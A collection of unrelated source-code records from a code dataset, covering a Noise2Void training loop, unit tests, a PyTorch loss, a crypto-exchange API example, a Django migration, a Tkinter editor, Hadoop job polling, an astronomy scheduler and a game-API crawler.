  batch_size: int\r\n        The batch size, i.e. the number of patches processed simultaneously on the GPU.\r\n    patch_size: int\r\n        The width and height of the square training patches.\r\n    num_masked_pixels: int\r\n        The number of pixels that are to be manipulated/masked N2V style in every training patch.\r\n    virtual_batch_size: int\r\n        The number of batches that are processed before a gradient step is performed.\r\n    val_size: int\r\n        The number of validation patches processed after each epoch.\r\n    augment: bool\r\n        Should the patches be randomly flipped and rotated?\r\n    supervised: bool\r\n        If True, the clean images are used as training targets instead of the self-supervised N2V/PN2V targets.\r\n\r\n\r\n    Returns\r\n    ----------\r\n    train_hist: numpy array\r\n        A numpy array containing the avg. training loss of each epoch.\r\n    val_hist: numpy array\r\n        A numpy array containing the avg. 
validation loss after each epoch.\r\n    '''\r\n\r\n    # Calculate mean and std of image.\r\n    combined = np.concatenate((train_data, val_data))\r\n    net.mean = np.mean(combined)\r\n    net.std = np.std(combined)\r\n\r\n    # Everything that is processed by the net will be normalized and denormalized using these numbers.\r\n    # TODO: Figure out how to get the reduce learning rate thing to work\r\n    lr_schedule = 1e-4\r\n    # lr_schedule = tf.keras.callbacks.ReduceLROnPlateau(monitor='min', patience=10, factor=0.5, verbose=True)\r\n    optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\r\n\r\n    data_counter = 0\r\n\r\n    train_hist = []\r\n    val_hist = []\r\n\r\n    for epoch in range(epochs):\r\n        # Reset per epoch; keep this a list while collecting (appending to a numpy\r\n        # array would fail) and convert once the epoch is done.\r\n        losses = []\r\n        for _ in range(steps_per_epoch):\r\n            for a in range(virtual_batch_size):\r\n                loss = training_pred(train_data,\r\n                                     net,\r\n                                     data_counter,\r\n                                     patch_size,\r\n                                     batch_size,\r\n                                     num_masked_pixels,\r\n                                     augment=augment,\r\n                                     supervised=supervised,\r\n                                     noise_model=noise_model,\r\n                                     optimizer=optimizer)\r\n\r\n                losses.append(loss)\r\n\r\n        losses = np.array(losses)\r\n        print(f\"Epoch: {epoch}, avg. loss: {np.mean(losses)} +-(2SEM) {2.0 * np.std(losses) / np.sqrt(losses.size)}\")\r\n        train_hist.append(np.mean(losses))\r\n        tf.saved_model.save(net, os.path.join(directory, \"last_\" + postfix + \".net\"))\r\n\r\n        val_counter = 0\r\n        # net.trainable = False empties net.trainable_variables, so training_pred\r\n        # computes the validation loss without applying a weight update.\r\n        net.trainable = False\r\n        val_losses = []\r\n        for i in range(val_size):\r\n            loss = training_pred(val_data,\r\n                                 net,\r\n                                 val_counter,\r\n                                 patch_size,\r\n                                 batch_size,\r\n                                 num_masked_pixels,\r\n                                 augment=augment,\r\n                                 supervised=supervised,\r\n                                 noise_model=noise_model,\r\n                                 optimizer=optimizer)\r\n            val_losses.append(loss)\r\n        net.trainable = True\r\n\r\n        avg_val_loss = np.mean(val_losses)\r\n        if len(val_hist) == 0 or avg_val_loss < np.min(np.array(val_hist)):\r\n            tf.saved_model.save(net, os.path.join(directory, \"best_\" + postfix + \".net\"))\r\n        val_hist.append(avg_val_loss)\r\n        # epoch + 1 entries have accumulated, so the epoch axis must match that length\r\n        np.save(os.path.join(directory, \"history\" + postfix + \".npy\"),\r\n                (np.array([np.arange(epoch + 1), train_hist, val_hist])))\r\n\r\n    return train_hist, val_hist\r\n","sub_path":"noise_models/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":15357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
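A tiny numeric check of the masked N2V objective implemented in loss_n2v above. The toy tensors are illustrative only (not taken from the repository); the point is that only masked pixels contribute to the loss:

import tensorflow as tf

# one predicted 'sample', a 2x2 label patch, and a mask selecting a single pixel
samples = tf.constant([[[[1.0, 2.0], [3.0, 4.0]]]])  # (n_samples=1, batch=1, 2, 2)
labels = tf.constant([[[2.0, 2.0], [3.0, 4.0]]])     # (batch=1, 2, 2)
masks = tf.constant([[[1.0, 0.0], [0.0, 0.0]]])      # only pixel (0, 0) was manipulated

errors = (labels - tf.reduce_mean(samples, axis=0)) ** 2
loss = tf.reduce_sum(errors * masks) / tf.reduce_sum(masks)
print(float(loss))  # 1.0 -- the unmasked pixels are ignored entirely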
+{"seq_id":"513125192","text":"import unittest\nimport os\nimport sys\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom custom_object import CustomObject\nfrom readers.xml_reader import XmlReader\n\nclass Test_XmlReader(unittest.TestCase):\n\n def test_custom_object_load_with_bad_file_path_verify_sys_exit_is_called(self):\n with self.assertRaises(SystemExit):\n custom_object = CustomObject()\n reader = XmlReader(\"bad-path.bad\")\n custom_object.load(reader.data)\n\n def test_custom_object_load_with_invalid_file_verify_sys_exit_is_called(self):\n with self.assertRaises(SystemExit):\n custom_object = CustomObject()\n reader = XmlReader(\"sample.yml\")\n custom_object.load(reader.data)\n \n def test_custom_object_load_with_good_data_verify_field_contents_are_correct(self):\n custom_object = CustomObject()\n reader = XmlReader(\"sample.xml\")\n custom_object.load(reader.data)\n self.assertEqual(custom_object.username, \"fake-username\") \n self.assertEqual(custom_object.password, \"fake-password\") \n self.assertEqual(custom_object.base_url, \"https://www.fake-url.com\")\n self.assertEqual(len(custom_object.objects), 3)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_xml_reader.py","file_name":"test_xml_reader.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"644428060","text":"import torch\nfrom torch import nn\n\n\nclass LabelSmoothingLoss(nn.Module):\n def __init__(self, num_classes: int, smoothing: float = 0.0,\n dim: int = -1):\n super(LabelSmoothingLoss, self).__init__()\n self.smoothing = smoothing\n self.confidence = 1.0 - self.smoothing\n self.num_classes = num_classes\n self.dim = dim\n\n def forward(self, pred: torch.Tensor, target: torch.Tensor):\n pred = pred.log_softmax(dim=self.dim)\n with torch.no_grad():\n true_dist = torch.zeros_like(pred)\n true_dist.fill_(self.smoothing / (self.num_classes - 1))\n true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))","sub_path":"interactive_spectrogram_inpainting/utils/losses/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"600626151","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nimport sys\nfrom pprint import pprint\n\nroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(root + '/python')\n\nimport ccxt.async_support as ccxt # noqa: E402\n\n\nasync def loop(exchange):\n while True:\n try:\n balance = await exchange.fetch_balance({\n 'type': 'margin',\n })\n pprint(balance)\n except Exception as e:\n print('fetch_balance() failed')\n print(e)\n\n\nasync def main():\n exchange = ccxt.okex({\n 'apiKey': 'YOUR_API_KEY',\n 'secret': 'YOUR_SECRET',\n # okex requires this: https://github.com/ccxt/ccxt/wiki/Manual#authentication\n 'password': 'YOUR_API_PASSWORD'\n })\n await loop(exchange)\n await exchange.close()\n\n\nasyncio.run(main())\n","sub_path":"examples/py/async-okex-fetch-margin-balance-with-params.py","file_name":"async-okex-fetch-margin-balance-with-params.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17759909","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('offers', '0006_auto_20160614_1823'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Tcat',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=256, help_text='Введите название', verbose_name='Название Категории')),\n ('clicks', models.IntegerField(verbose_name='Клики', default=0)),\n ('metadescription', models.TextField(max_length=10000, verbose_name='meta description', blank=True)),\n ('metatitle', models.TextField(max_length=10000, verbose_name='meta title', blank=True)),\n ('metakeywords', models.TextField(max_length=10000, verbose_name='Ключевые слова', blank=True)),\n ('text1', models.TextField(max_length=10000, verbose_name='Описание1', blank=True)),\n ('text2', models.TextField(max_length=10000, verbose_name='Описание2', blank=True)),\n ('parent', models.IntegerField(null=True, verbose_name='Родительская категория', default=0, blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', default=True)),\n ('sort', models.IntegerField(null=True, verbose_name='Сортировка', default=0, blank=True)),\n ('img', models.CharField(max_length=1000, verbose_name='Изображение', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Категории',\n 'verbose_name': 'Категория',\n },\n ),\n migrations.CreateModel(\n name='Tcatb',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=256, help_text='Введите название', verbose_name='Название Категории')),\n ('parent', models.IntegerField(null=True, verbose_name='Родительская категория', default=0, blank=True)),\n ('idbroker', models.CharField(max_length=200, verbose_name='ID категории у брокера', blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', default=True)),\n ('broker', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='offers.Brokers', verbose_name='Площадка офера')),\n ('cat', models.ManyToManyField(to='tovars.Tcat')),\n ],\n options={\n 'verbose_name_plural': 'Категории брокера',\n 'verbose_name': 'Категория брокера',\n },\n ),\n migrations.CreateModel(\n name='Tovars',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=10000, blank=True, help_text='Введите название', verbose_name='Название')),\n ('img', models.CharField(max_length=10000, verbose_name='Изображение', blank=True)),\n ('link', models.CharField(max_length=1000, verbose_name='Реальная ссылка', blank=True)),\n ('description', models.TextField(max_length=5000, verbose_name='Информация', blank=True)),\n ('meta_description', models.TextField(max_length=5000, verbose_name='Мета тэг', blank=True)),\n ('meta_keywords', models.TextField(max_length=10000, verbose_name='Мета тэг', blank=True)),\n ('idbroker', models.CharField(max_length=200, verbose_name='ID товара у брокера', blank=True)),\n ('price', models.DecimalField(max_digits=19, decimal_places=2)),\n ('clicks', models.IntegerField(default=0)),\n ('date', models.DateTimeField(auto_now_add=True, null=True)),\n ('rating', models.CharField(max_length=256, verbose_name='Рейтинг', blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', 
default=True)),\n ('catb', models.ForeignKey(to='tovars.Tcatb', verbose_name='Категория брокера', null=True)),\n ('offer', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='offers.Offers', verbose_name='Оофер')),\n ],\n options={\n 'verbose_name_plural': 'Товары',\n 'verbose_name': 'Товар',\n },\n ),\n ]\n","sub_path":"tovars/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"644108894","text":"import requests as request\nimport time\n\ndef getAllApplicationsIdList(proxies=None):\n\n requestLinkString = 'http://localhost:8088/ws/v1/cluster/apps'\n allApplications = request.get(requestLinkString,proxies=proxies).json()\n \n #If there is no application running currently\n if(allApplications['apps'] == None):\n return\n else:\n applicationDetailList = allApplications['apps']['app']\n applicationIdList = [applicationDetail['id'] for applicationDetail in applicationDetailList]\n return applicationIdList\n \n \n \ndef getAllJobsIdList(applicationId , proxies=None):\n requestLinkString = \"http:///proxy/\" + applicationId + \"/ws/v1/mapreduce/jobs\"\n allJobs = request.get(requestLinkString,proxies=proxies).json()\n \n #If there are no Jobs running for the given application Id\n if(allJobs['jobs']==None):\n return\n else:\n jobDetailList = allJobs['jobs']['job']\n jobIdList = [str(jobDetail['id']) for jobDetail in jobDetailList]\n return jobIdList\n\n \n\ndef getNewCompletedTasks(applicationId , jobId , alreadyReportedTasks , proxies = None):\n \n requestLinkString = \"http:///proxy/\" + applicationId + \"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks\"\n \n allTasks = request.get(requestLinkString,proxies=proxies).json()\n \n if(allTasks['tasks'] == None):\n print('No running task for this' + 'Application ID: ' +applicationId +' Job Id: ' +jobId)\n return\n \n else:\n \n taskDetailList = allTasks['tasks']['task']\n \n #Logic to get the non reported completed task goes here\n \n newCompletedTaskIdList = [str(taskDetail['id']) for taskDetail in taskDetailList if str(taskDetail['state'])=='SUCCEEDED'\n and str(taskDetail['id']) not in alreadyReportedTasks]\n \n return newCompletedTaskIdList \n \n\n\ndef getSuccessfulTaskAttemptId(applicationId , jobId , taskId , proxies = None):\n \n requestLinkString = \"http:///proxy/\"+applicationId+\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts\"\n \n allTaskAttempts = request.get(requestLinkString,proxies=proxies).json()\n if(allTaskAttempts['taskAttempts'] == None):\n print('No attempt has made till now for applicationId '+applicationId+' jobId '+jobId+' taskId '+taskId)\n return\n else:\n \n allTaskAttemptDetaillist = allTaskAttempts['taskAttempts']['taskAttempt']\n successfulTaskAttemptIdList = [str(allTaskAttemptDetail['id']) for allTaskAttemptDetail in allTaskAttemptDetaillist \n if str(allTaskAttemptDetail['state']) == 'SUCCEEDED' ]\n return successfulTaskAttemptIdList\n\n\n \n\ndef getTaskCounter(applicationId , jobId , taskId , attemptId , proxies = None):\n \n requestLinkString = \"http:///proxy/\"+applicationId+\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts/\"+attemptId+\"/counters\"\n \n TaskCounter = request.get(requestLinkString,proxies=proxies).json()\n \n if(TaskCounter['JobTaskAttemptCounters']==None):\n print('There is no task counter data available for attemptId '+attemptId+' Task Id'+ taskId)\n else:\n return TaskCounter \n \n \ndef getNodeOfTask(applicationId , jobId , taskId , attemptId ,proxies = None):\n \n requestLinkString = \"http:///proxy/\" +applicationId +\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts\"\n \n #allTaskAttempts = request.get(requestLinkString,proxies=proxies).json()\n \n if(allTaskAttempts['taskAttempts'] == None):\n print('No attempt has made till now for applicationId '+applicationId+' jobId '+jobId+' taskId '+taskId)\n return\n else:\n \n allTaskAttemptDetaiList = allTaskAttempts['taskAttempts']['taskAttempt']\n taskNodeDetailTuple 
= [( str(allTaskAttemptDetail['nodeHttpAddress']) , str(allTaskAttemptDetail['rack']) )\n                               for allTaskAttemptDetail in allTaskAttemptDetaiList\n                               if str(allTaskAttemptDetail['id']) == attemptId ]\n        return taskNodeDetailTuple\n\n\nif __name__=='__main__':\n\n#In case Proxy Server Authentication is required, please put the user, password, ip and port of the client side in the respective variables\n#USER =''\n#PASSWORD=''\n#IP=''\n#PORT=''\n#proxies = { 'http' : 'http://user:password@ip:port' , 'https' : 'https://user:password@ip:port' }\n\n    # If you have configured the proxy above, remove the line below\n    proxies = None\n    print(\"All the running Application's ID\")\n\n    allApplicationsIdList = getAllApplicationsIdList(proxies=proxies)\n\n    if(allApplicationsIdList != None) :\n        #print all the Application Ids\n        for applicationId in allApplicationsIdList:\n            print(applicationId)\n\n        print('Please enter the Application ID to get all the Job IDs for the application')\n        appId = str(input())\n\n        jobIdList = getAllJobsIdList(applicationId = appId , proxies=proxies)\n\n        if(jobIdList != None):\n            print('All the jobs for application: '+appId)\n            for jobId in jobIdList:\n                print(jobId)\n\n            print('Please enter the job Id to get all the task details for the job')\n            jId = str(input())\n            #As there are no reported tasks at the beginning, an empty list is declared\n            alreadyReportedTasks = []\n\n            while True:\n                newCompletedTasks = getNewCompletedTasks(applicationId = appId , jobId = jId , alreadyReportedTasks = alreadyReportedTasks , proxies=proxies)\n\n                if(newCompletedTasks != None):\n                    for newCompletedTask in newCompletedTasks:\n                        #Assumes there is only one successful task attempt per task\n                        successfulTaskAttemptId = getSuccessfulTaskAttemptId(applicationId = appId , jobId = jId , taskId = newCompletedTask , proxies=proxies)[0]\n                        taskCounter = getTaskCounter(applicationId = appId, jobId = jId, taskId = newCompletedTask, attemptId = successfulTaskAttemptId , proxies=proxies)\n                        print('TaskCounter for the Task: '+newCompletedTask)\n                        print(taskCounter)\n\n                        nodeOfTask = getNodeOfTask(applicationId = appId, jobId = jId , taskId =newCompletedTask, attemptId = successfulTaskAttemptId , proxies=proxies)\n\n                        print('Node Http Address and the rack for the Node on which the task completed')\n                        print(nodeOfTask)\n\n                    alreadyReportedTasks.extend(newCompletedTasks)\n\n                #sleep for 20 seconds between polls\n                time.sleep(20)\n\n        else:\n            print('No job running for the Application Id: '+appId)\n\n    else:\n        print('No Application running currently')\n","sub_path":"HadoopJobTracker.py","file_name":"HadoopJobTracker.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
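The filtering in getNewCompletedTasks is plain list logic, so it can be sanity-checked without a cluster; the task dicts below are fabricated for illustration:

taskDetailList = [
    {'id': 'task_1', 'state': 'SUCCEEDED'},
    {'id': 'task_2', 'state': 'RUNNING'},
    {'id': 'task_3', 'state': 'SUCCEEDED'},
]
alreadyReportedTasks = ['task_1']
new = [str(t['id']) for t in taskDetailList
       if str(t['state']) == 'SUCCEEDED' and str(t['id']) not in alreadyReportedTasks]
print(new)  # ['task_3'] -- already-reported and still-running tasks are skipped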
+{"seq_id":"125144779","text":"import tkinter as tk #tk is a class in tkinter\nfrom tkinter import ttk\nfrom tkinter import font,colorchooser,filedialog,messagebox\nimport os\n\nmain_application=tk.Tk() \n#tk is alias of tkinter \n# main_application is object\n# Tk is class in tkinter\nmain_application.geometry('1200x800')\nmain_application.title('Text Editor')\n\n####################### main menu ###############################\n\nmain_menu = tk.Menu()\n\n\n##---------------file------------------##\nnew_icon = tk.PhotoImage(file='icons2/new.png')\nopen_icon = tk.PhotoImage(file='icons2/open.png')\nsave_icon = tk.PhotoImage(file='icons2/save.png')\nsave_as_icon = tk.PhotoImage(file='icons2/save_as.png')\nexit_icon = tk.PhotoImage(file='icons2/exit.png')\n\nfile = tk.Menu(main_menu, tearoff=False)\n\n\n\n\n##--------------edit------------------## \ncopy_icon = tk.PhotoImage(file='icons2/copy.png')\npaste_icon = tk.PhotoImage(file='icons2/paste.png')\ncut_icon = tk.PhotoImage(file='icons2/cut.png')\nclear_all_icon = tk.PhotoImage(file='icons2/clear_all.png')\nfind_icon = tk.PhotoImage(file='icons2/find.png')\n\nedit = tk.Menu(main_menu, tearoff=False)\n\n\n##-------------view---------------------## \ntool_bar_icon = tk.PhotoImage(file='icons2/tool_bar.png')\nstatus_bar_icon = tk.PhotoImage(file='icons2/status_bar.png')\n\nview = tk.Menu(main_menu, tearoff=False)\n\n\n##-------------color theme--------------## \nlight_default_icon = tk.PhotoImage(file='icons2/light_default.png')\nlight_plus_icon = tk.PhotoImage(file='icons2/light_plus.png')\ndark_icon = tk.PhotoImage(file='icons2/dark.png')\nred_icon = tk.PhotoImage(file='icons2/red.png')\nmonokai_icon = tk.PhotoImage(file='icons2/monokai.png')\nnight_blue_icon = tk.PhotoImage(file='icons2/night_blue.png')\n\ncolor_theme = tk.Menu(main_menu, tearoff=False)\n\ntheme_choice = tk.StringVar()\ncolor_icons = (light_default_icon, light_plus_icon, dark_icon, red_icon, monokai_icon, night_blue_icon)\n\ncolor_dict = { \n 'Light Default ' : ('#000000', '#ffffff'), \n 'Light Plus' : ('#474747', '#e0e0e0'),\n 'Dark' : ('#c4c4c4', '#2d2d2d'),\n 'Red' : ('#2d2d2d', '#ffe8e8'),\n 'Monokai' : ('#d3b774', '#474747'),\n 'Night Blue' :('#ededed', '#6b9dc2')\n }\n\n\n#-----Adding file/edit/view/colortheme to menu-----------------#\nmain_menu.add_cascade(label='File', menu=file)\nmain_menu.add_cascade(label='Edit', menu=edit)\nmain_menu.add_cascade(label='View', menu=view)\nmain_menu.add_cascade(label='Color Theme', menu=color_theme)\n\n#----filedropdown-----#\nfile.add_command(label='New', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+N')\nfile.add_command(label='Open', image=open_icon, compound=tk.LEFT, accelerator='Ctrl+O')\nfile.add_command(label='Save', image=save_icon, compound=tk.LEFT, accelerator='Ctrl+S')\nfile.add_command(label='Save As', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+S')\nfile.add_command(label='Exit', image=exit_icon, compound=tk.LEFT, accelerator='Ctrl+Q')\n\n#----editdropdown-----# \nedit.add_command(label='Copy', image=copy_icon, compound=tk.LEFT, accelerator='Ctrl+C')\nedit.add_command(label='Paste', image=paste_icon, compound=tk.LEFT, accelerator='Ctrl+V')\nedit.add_command(label='Cut', image=cut_icon, compound=tk.LEFT, accelerator='Ctrl+X')\nedit.add_command(label='Clear All', image=clear_all_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+X')\nedit.add_command(label='Find', image=find_icon, compound=tk.LEFT, accelerator='Ctrl+F')\n\n#----viewdropdown-----#\nview.add_checkbutton(label='Tool Bar', 
image=tool_bar_icon, compound=tk.LEFT)\nview.add_checkbutton(label='Status Bar', image=status_bar_icon, compound=tk.LEFT)\n\ncount = 0 \nfor i in color_dict:\n color_theme.add_radiobutton(label = i, image=color_icons[count], variable=theme_choice, compound=tk.LEFT)\n count += 1 \n\n\n\n\n######################tool bar ##################################\n\ntool_bar = ttk.Label(main_application) # label will display the box where you can place text or images. The text displayed by this widget can be updated at any time you want.\ntool_bar.pack(side=tk.TOP , fill=tk.X) #pack() method declares the position of widgets in relation to each other.\n\n#font box\nfont_tuple = tk.font.families() #It will give all the font families present in the tk.\nfont_family = tk.StringVar()\nfont_box=ttk.Combobox(tool_bar,width=30,textvariable=font_family,state='readonly') #Combobox is the drop-down list.\nfont_box['values']=font_tuple\nfont_box.current(font_tuple.index('Arial'))\nfont_box.grid(row=0,column=0,padx=5) #grid widget is split into a number of rows and columns\n\n#size box\nsize_var = tk.IntVar()\nfont_size=ttk.Combobox(tool_bar,width=14,textvariable=size_var,state='readonly') #Combobox is for drop-down list.\nfont_size['values']=tuple(range(8,80,2))\nfont_size.current(4)\nfont_size.grid(row=0, column=1, padx=5) #grid widget is used to split into a number of rows and columns\n\n## bold button \nbold_icon = tk.PhotoImage(file='icons2/bold.png') # photoimage is Used to add the images\nbold_btn = ttk.Button(tool_bar, image=bold_icon) #button is used to add buttons\nbold_btn.grid(row=0, column=2, padx=5) #grid widget is split into a number of rows and columns\n\n## italic button \nitalic_icon = tk.PhotoImage(file='icons2/italic.png') # photoimage is Used to add the images\nitalic_btn = ttk.Button(tool_bar, image=italic_icon)#button is used to add buttons\nitalic_btn.grid(row=0, column=3, padx=5) #grid widget is split into a number of rows and columns\n\n## underline button \nunderline_icon = tk.PhotoImage(file='icons2/underline.png') # photoimage is Used to add the images\nunderline_btn = ttk.Button(tool_bar, image = underline_icon) #button is used to add buttons\nunderline_btn.grid(row = 0, column=4, padx=5) #grid widget is split into a number of rows and columns\n\n## font color button \nfont_color_icon = tk.PhotoImage(file='icons2/font_color.png') # photoimage is Used to add the images\nfont_color_btn = ttk.Button(tool_bar, image=font_color_icon) #button is used to add buttons\nfont_color_btn.grid(row=0, column=5,padx=5) #grid widget is split into a number of rows and columns\n\n## align left \nalign_left_icon = tk.PhotoImage(file='icons2/align_left.png') # photoimage is Used to add the images\nalign_left_btn = ttk.Button(tool_bar, image=align_left_icon) #button is used to add buttons\nalign_left_btn.grid(row=0, column=6, padx=5)#grid widget is split into a number of rows and columns\n\n## align center \nalign_center_icon = tk.PhotoImage(file='icons2/align_center.png') # photoimage is Used to add the images\nalign_center_btn = ttk.Button(tool_bar, image=align_center_icon) #button is used to add buttons\nalign_center_btn.grid(row=0, column=7, padx=5) #grid widget is split into a number of rows and columns\n\n## align right \nalign_right_icon = tk.PhotoImage(file='icons2/align_right.png') # photoimage is Used to add the images\nalign_right_btn = ttk.Button(tool_bar, image=align_right_icon) #button is used to add buttons\nalign_right_btn.grid(row=0, column=8, padx=5) #grid widget is split into a number 
of rows and columns\n\n######################End Tool Bar##############################\n\n######################text editor###############################\n\n#######################status bar###############################\n\n########################shortcut keys###########################\n\nmain_application.config(menu=main_menu)\nmain_application.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
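The menu entries above are built without command callbacks; a minimal sketch of wiring one up (the handler below is hypothetical, not part of the original file):

def exit_editor():
    main_application.destroy()

# tkinter menu entries can be addressed by their label
file.entryconfig('Exit', command=exit_editor)
main_application.bind('<Control-q>', lambda event: exit_editor())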
+{"seq_id":"373462523","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport healpy as hp\nfrom lsst.sims.featureScheduler.modelObservatory import Model_observatory\nfrom lsst.sims.featureScheduler.schedulers import Core_scheduler\nfrom lsst.sims.featureScheduler.utils import standard_goals, calc_norm_factor\nimport lsst.sims.featureScheduler.basis_functions as bf\nfrom lsst.sims.featureScheduler.surveys import (generate_dd_surveys, Greedy_survey,\n Blob_survey, Pairs_survey_scripted)\nfrom lsst.sims.featureScheduler import sim_runner\n\n\ndef gen_greedy_surveys(nside, m5_weight=3., count_uniformity_weight=0.3,\n slewtime_weight=3., filter_change_weight=3.,\n filters = ['u', 'g', 'r', 'i', 'z', 'y'], add_DD=False,\n pairs=False):\n \"\"\"\n Make a quick set of greedy surveys\n \"\"\"\n sg = standard_goals(nside=nside)\n target_map = {}\n for key in filters:\n target_map[key] = sg[key]\n norm_factor = calc_norm_factor(target_map)\n surveys = []\n\n for filtername in filters:\n bfs = []\n bfs.append(bf.M5_diff_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Target_map_basis_function(filtername=filtername,\n target_map=target_map[filtername],\n out_of_bounds_val=np.nan, nside=nside,\n norm_factor=norm_factor))\n bfs.append(bf.Slewtime_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Strict_filter_basis_function(filtername=filtername))\n # Masks, give these 0 weight\n bfs.append(bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=60., max_alt=76.))\n bfs.append(bf.Moon_avoidance_basis_function(nside=nside, moon_distance=40.))\n bfs.append(bf.Clouded_out_basis_function())\n\n bfs.append(bf.Filter_loaded_basis_function(filternames=filtername))\n\n weights = np.array([m5_weight, count_uniformity_weight, slewtime_weight, filter_change_weight,\n 0., 0., 0., 0.])\n surveys.append(Greedy_survey(bfs, weights, block_size=1, filtername=filtername,\n dither=True, nside=nside, ignore_obs='DD'))\n\n if pairs:\n surveys.append(Pairs_survey_scripted(None, ignore_obs='DD'))\n if add_DD:\n dd_surveys = generate_dd_surveys(nside=nside)\n surveys.extend(dd_surveys)\n\n return surveys\n","sub_path":"slair_examples/1filter/basic_survey.py","file_name":"basic_survey.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"488865749","text":"#!/usr/bin/python\n\nimport asyncio\nimport aiohttp\n\nTOKEN = \"aaa.bbb.ccc\"\nAPIURL = \"https://api.dc01.gamelockerapp.com/\"\n\n\nclass Crawler(object):\n def __init__(self):\n \"\"\"Sets constants.\"\"\"\n self._apiurl = APIURL\n self._token = TOKEN\n self._pagelimit = 50\n\n async def _req(self, session, path, params=None):\n \"\"\"Sends an API request and returns the response dict.\n\n :param session: aiohttp client session.\n :type session: :class:`aiohttp.ClientSession`\n :param path: URL path.\n :type path: str\n :param params: (optional) Request parameters.\n :type params: dict\n :return: API response.\n :rtype: dict\n \"\"\"\n headers = {\n \"Authorization\": \"Bearer \" + self._token,\n \"X-TITLE-ID\": \"semc-vainglory\",\n \"Accept\": \"application/vnd.api+json\",\n \"Content-Encoding\": \"gzip\"\n }\n async with session.get(self._apiurl + path, headers=headers,\n params=params) as response:\n assert response.status == 200\n return await response.json()\n\n async def version(self):\n \"\"\"Returns the current API version.\"\"\"\n\n async with aiohttp.ClientSession() as session:\n status = await self._req(session, \"status\")\n return status[\"data\"][\"attributes\"][\"version\"]\n\n async def matches(self, region=\"na\", params=None):\n \"\"\"Queries the API for matches and their related data.\n\n :param region: (optional) Region where the matches were played.\n Defaults to \"na\" (North America).\n :type region: str\n :param params: (optional) Additional filters.\n :type params: dict\n :return: Processed API response\n :rtype: list of dict\n \"\"\"\n forever = False # do not fetch until exhausted\n if params is None:\n params = dict()\n if \"page[limit]\" not in params:\n forever = True # no limit specified, fetch all we can\n params[\"page[limit]\"] = self._pagelimit\n if \"page[offset]\" not in params:\n params[\"page[offset]\"] = 0\n\n data = []\n async with aiohttp.ClientSession() as session:\n while True:\n params[\"page[offset]\"] += params[\"page[limit]\"]\n try:\n print(\"asking for more matches…\")\n res = await self._req(session,\n \"shards/\" + region + \"/matches\",\n params)\n except AssertionError:\n break\n\n data += res[\"data\"] + res[\"included\"]\n\n if not forever:\n break # stop after one iteration\n\n return data\n\n async def matches_since(self, date, region=\"na\", params=None):\n \"\"\"Queries the API for new matches since the given date.\n\n :param region: see `matches`\n :type region: str\n :param date: Start date in ISO8601 format.\n :type date: str\n :param params: (optional) Additional filters.\n :type params: dict\n :return: Processed API response\n :rtype: list of dict\n \"\"\"\n if params is None:\n params = dict()\n params[\"filter[createdAt-start]\"] = date\n return await self.matches(region, params)\n","sub_path":"api/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
